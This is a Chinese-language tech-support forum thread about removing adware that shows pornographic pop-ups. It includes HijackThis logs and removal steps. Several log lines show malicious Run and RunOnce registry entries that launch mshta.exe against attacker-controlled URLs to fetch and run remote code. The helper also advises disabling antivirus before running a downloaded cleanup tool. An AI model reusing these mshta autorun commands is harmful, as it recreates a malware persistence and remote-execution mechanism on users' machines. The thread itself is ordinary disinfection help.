查看完整版本 : 電腦彈廣告,PLZ HELP (附HIJACKTHIS)

nick888 2014-12-12 02:26 PM

電腦彈廣告,PLZ HELP (附HIJACKTHIS)

一開電腦就有日本黃色廣告彈出黎
C:\Program Files (x86)\Garena Plus\ggdllhost.exe
C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe
C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Garena Plus\bbtalk\BBtalk.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Users\User\Desktop\HijackThis.exe
F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live 登入小幫手 - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files (x86)\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [FUFAXSTM] "C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe"
O4 - HKLM\..\Run: [EEventManager] C:\PROGRA~2\EPSONS~1\EVENTM~1\EEventManager.exe
O4 - HKCU\..\Run: [EPSON ME 650FN Series] C:\Windows\system32\spool\DRIVERS\x64\3\E_IATIFHC.EXE /FU "C:\Windows\TEMP\E_SD854.tmp" /EF "HKCU"
O4 - HKCU\..\Run: [GarenaPlus] "C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe" -autolaunch
O4 - HKCU\..\Run: [SystemBootBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url=http://fpb.pluhgtaw.org/reg2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi&log=1]http://fpb.pluhgtaw.org/reg2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi&log=1[/url]
O4 - HKCU\..\Run: [RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url=http://fpb.pluhgtaw.org/set_inf2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi]http://fpb.pluhgtaw.org/set_inf2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi[/url]
O4 - HKCU\..\RunOnce: [RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url=http://fpb.pluhgtaw.org/set_inf2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi]http://fpb.pluhgtaw.org/set_inf2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi[/url]
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'UpdatusUser')
O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'UpdatusUser')
O8 - Extra context menu item: 匯出至 Microsoft Excel(&X) - res://C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~2\Office12\REFIEBAR.DLL
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: [url=http://*.update.microsoft.com]http://*.update.microsoft.com[/url]
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - [url=http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab]http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab[/url]
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Baidu Updater (BaiduUpdater) - Baidu.com, Inc. - C:\Program Files (x86)\Baidu\BaiduUpdate\bdupdate.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: ESET Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Google更新 服務 (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google更新 服務 (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Integrated Clock Controller Service - Intel(R) ICCS (ICCS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: NVIDIA Update Service Daemon (nvUpdatusService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files (x86)\CyberLink\Shared Files\RichVideo.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

andrew412345 2014-12-12 03:28 PM

估計你的狀況:
1開機後沒多久就會出現一個色情廣告視窗~ 大致上就是說你已經加入會員要你付錢! 會有一個養眼的照片,還有倒數計時的視窗。
2.視窗的標題會是"welcome!!" 或者 "ero tube" ...等等不同的標題。
3.叫出工作管理員將其結束,等等過一下子又出現了。

檢查方式:

1.開始->執行>msconfig
2.在啟動頁面裡找 ,將命令的欄位拉大一點,往下找;如果有發現一個mshta:開頭的東西,就八九不離十了。
3.大概都是長這樣 mshta:c:\programdata\XXXX\XXXXX.hta   XXXXX代表隨機的英文字母組合。(要抄起來

解決方式
1.叫出工作管理員,ctrl+alt+del  , 處理程序裡面有一個mshta.exe,點選按右鍵,>結束處理程序樹狀目錄,確定。
2.到 c:\programdata\XXXX   XXXXX代表隨機的英文字母組合。(programdata為隱藏的資料夾,需先顯示隱藏的資料夾。)
3.裡面會有一個bg.jpg 你看一看應該就是那個噴血的美女圖,BINGO!!
4.將整個資料夾刪除(shift+del)。
5.執行msconfig 將啟動裡面的mshta開頭的那個項目打勾取消掉。
6.重新開機。
7.下課,尿尿。


顯示隱藏資料夾教學 :
[url]http://www.synnex.com.tw/asp/fae_qaDetail.asp?from_prg=&topic=FAE&group=&parent=&classifyid=01536&seqno=20672[/url]

nick888 2014-12-12 04:26 PM

回覆 2# 的帖子

已照指示做但仍然有彈出,點算:(

andrew412345 2014-12-12 04:30 PM

刪除 c:\programdata\XXXX   XXXXX

執行msconfig 將啟動裡面的mshta開頭的那個項目打勾取消掉

後問題依舊持續?


再用 HijackThis 掃一次 POST 份LOG.

nick888 2014-12-12 04:37 PM

回覆 4# 的帖子

C:\Program Files (x86)\Garena Plus\ggdllhost.exe
C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe
C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
D:\tt player\TTPlayer.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Garena Plus\bbtalk\BBtalk.exe
C:\Windows\SysWOW64\rundll32.exe
D:\LOL\TW\GameData\Apps\LoLTW\LoL.exe
D:\LOL\TW\GameData\Apps\LoLTW\Air\LOLClient.exe
C:\Users\User\Desktop\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live 登入小幫手 - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files (x86)\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [FUFAXSTM] "C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe"
O4 - HKLM\..\Run: [EEventManager] C:\PROGRA~2\EPSONS~1\EVENTM~1\EEventManager.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files (x86)\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [QuickDTV] C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuickDTV.exe
O4 - HKLM\..\Run: [ArcSoft Connection Service] C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
O4 - HKCU\..\Run: [EPSON ME 650FN Series] C:\Windows\system32\spool\DRIVERS\x64\3\E_IATIFHC.EXE /FU "C:\Windows\TEMP\E_SD854.tmp" /EF "HKCU"
O4 - HKCU\..\Run: [GarenaPlus] "C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe" -autolaunch
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\RunOnce: [RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url=http://dvc.qftazgyd.org/set_inf2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi]http://dvc.qftazgyd.org/set_inf2 ... 5ewPOfJVnYzXK7ZYjMi[/url]
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'UpdatusUser')
O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'UpdatusUser')
O4 - Global Startup: TMMonitor.lnk = C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TMMonitor.exe
O8 - Extra context menu item: 匯出至 Microsoft Excel(&X) - res://C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~2\Office12\REFIEBAR.DLL
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - [url=http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab]http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab[/url]
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Baidu Updater (BaiduUpdater) - Baidu.com, Inc. - C:\Program Files (x86)\Baidu\BaiduUpdate\bdupdate.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: ESET Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Google更新 服務 (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google更新 服務 (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Integrated Clock Controller Service - Intel(R) ICCS (ICCS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: NVIDIA Update Service Daemon (nvUpdatusService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files (x86)\CyberLink\Shared Files\RichVideo.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

[[i] 本帖最後由 nick888 於 2014-12-12 04:43 PM 編輯 [/i]]

andrew412345 2014-12-12 05:03 PM

1.開始- 輸入 「工作排程器」 點「工作排程器程式庫」
2.找到一堆亂碼的檔案 (有的會隱藏為檔名systemboot )
右鍵-內容-動作 看看有沒有指向 system32/mshta.exe[img]http://ichbhk.com/ts.png[/img]然後再點觸發程序確認是不是幾分鐘或幾秒鐘重複執行
確定之後右鍵-刪除
3.開始-打上msconfig 在"啟動"選項裡找到 mshta取消勾選
4.開始-打上regedit
HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Shared
Tools -> MSConfig -> startupreg 找到要刪除的 直接整個資料夾移除

5, 開Hijackthis程式 : 主界面,選擇【Do a system scan only】, 如果再出現 :
O4 - HKCU\..\RunOnce: [RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url=http://dvc.qftazgyd.org]http://dvc.qftazgyd.org[/url]
類似這個(有mshta.exe)的項目, 勾選, 再按【Fix checked】
然後 :

[u][color=red]Step 1 : 下載及執行 ComboFix[/color][/u]

[list][*]請先關閉所有防毒軟件,然後下載 [url=http://download.bleepingcomputer.com/sUBs/ComboFix.exe]ComboFix[/url] 至桌面[*]執行 [color=blue]ComboFix[/color],[color=blue]ComboFix[/color] 會彈出視窗,按[color=darkgreen]確定[/color],再按[color=darkgreen]是[/color][*][color=blue]ComboFix[/color] 會進行掃瞄,期間切勿執行其他程式或點擊 [color=blue]ComboFix[/color] 視窗[*]完成掃瞄後,[color=blue]ComboFix[/color] 可能會重新啟動電腦,其後 [color=blue]ComboFix[/color] 報告會自動彈出[*]該報告會自動儲存於 [color=red]C:\ComboFix.txt[/color][/list]
[u][color=red][u][color=red][/color][/u]
Step 2 : 簡述情況及貼上報告[/color][/u][color=#ff0000][/color][list][*]請簡述一下閣下電腦的狀況[*]貼上報告 :[list=1][*]HijackThis ( ComboFix 後再掃一次的 LOG )[*]ComboFix[/list]
[/list]

[[i] 本帖最後由 andrew412345 於 2014-12-12 05:39 PM 編輯 [/i]]

nick888 2014-12-12 06:00 PM

回覆 6# 的帖子

仍然有那個視窗,但變鬼空白一片

HIJACKTHIS
C:\Program Files (x86)\Garena Plus\ggdllhost.exe
C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe
C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe
C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
C:\Program Files (x86)\Garena Plus\bbtalk\BBtalk.exe
C:\Windows\SysWOW64\rundll32.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Users\User\Desktop\HijackThis.exe

O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live 登入小幫手 - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files (x86)\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [FUFAXSTM] "C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe"
O4 - HKLM\..\Run: [EEventManager] C:\PROGRA~2\EPSONS~1\EVENTM~1\EEventManager.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files (x86)\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKCU\..\Run: [GarenaPlus] "C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe" -autolaunch
O4 - HKCU\..\Run: [SystemBootBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url]http://imn.qftazgyd.org/reg2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi&log=1[/url]
O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'UpdatusUser')
O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'UpdatusUser')
O8 - Extra context menu item: 匯出至 Microsoft Excel(&X) - res://C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~2\Office12\REFIEBAR.DLL
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - [url]http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab[/url]
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Baidu Updater (BaiduUpdater) - Baidu.com, Inc. - C:\Program Files (x86)\Baidu\BaiduUpdate\bdupdate.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: ESET Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Google更新 服務 (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google更新 服務 (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Integrated Clock Controller Service - Intel(R) ICCS (ICCS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: NVIDIA Update Service Daemon (nvUpdatusService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files (x86)\CyberLink\Shared Files\RichVideo.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
